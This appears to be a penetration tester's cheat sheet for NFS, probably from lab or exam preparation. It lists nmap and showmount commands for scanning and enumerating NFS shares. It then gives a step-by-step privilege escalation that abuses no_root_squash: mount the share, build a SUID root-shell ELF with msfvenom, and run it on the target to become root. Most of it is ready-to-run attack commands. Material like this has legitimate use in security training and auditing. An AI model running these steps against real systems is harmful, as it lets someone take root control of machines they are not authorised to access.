NFS
Network File System - Port 2049
Allows a user on a client computer to access files over a network as if they were local
nmap -sV --script=nfs-showmount <tgt>
showmount -e <tgt>
NFS - Find and Enum
nmap -v -p 111 10.x.x.0/24 -oG nfs.nmap
cat nfs.nmap | grep 111 | grep -v "Nmap" | awk '{print $2}' > nfs.ip
nmap -sV -p111 --script=rpcinfo -iL nfs.ip
ls -l /usr/share/nmap/scripts/nfs*
nmap -p111 --script "nfs*" -iL nfs.ip -oN nfs.enum
NFS - Sweep
Wildcard NSE didn't work well
Better to run the NSE scripts individually or in a loop
> nmap -sV -p111,2049 10.x.x.0/24 -oG nfs.nmap
> grep open nfs.nmap | cut -d' ' -f2 > nfs.ip
> nmap -sV -p111,2049 --script=rpcinfo -iL nfs.ip -oN rpc_scripts.nmap
> nmap -sV -p111 --script=nfs* -iL nfs.ip -oN nfs_scripts2.nmap
> for vuln in $(ls -1 /usr/share/nmap/scripts/nfs* | cut -d "/" -f6);
do nmap -p 111 --script $vuln 10.11.1.72; done
NFS Root Squashing
Network File System
Send a rootbash over NFS with local root impersonating remote root
Only works if "no_root_squash" is set
Remote users can: mount/access/create/modify files
Default: Created files inherit remote user/group ID
Even if not on the NFS server
How NFS protects against obvious privesc
If remote user claims to be root uid=0
NFS will squash it and treat the user as nobody
Feature can be disabled!
REF: TarBackups
-------------------------
showmount -e <tgt>
nmap -sV --script=nfs-showmount <tgt>
mount -o rw,vers=2 <tgt>:<share> <localdir>
-------------------------
lse.sh -l 2 -i ..found nfs share
cat /etc/exports
/tmp *(rw,sync,no_root_squash)
-------------------------
Local:
showmount -e 192.x.y.z
mkdir /tmp/nfs
mount -o rw,vers=2 192.x.y.z:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf
-------------------------
Target:
ls -l /tmp ..owned by root, with suid
/tmp/shell.elf ..executed as root
root!!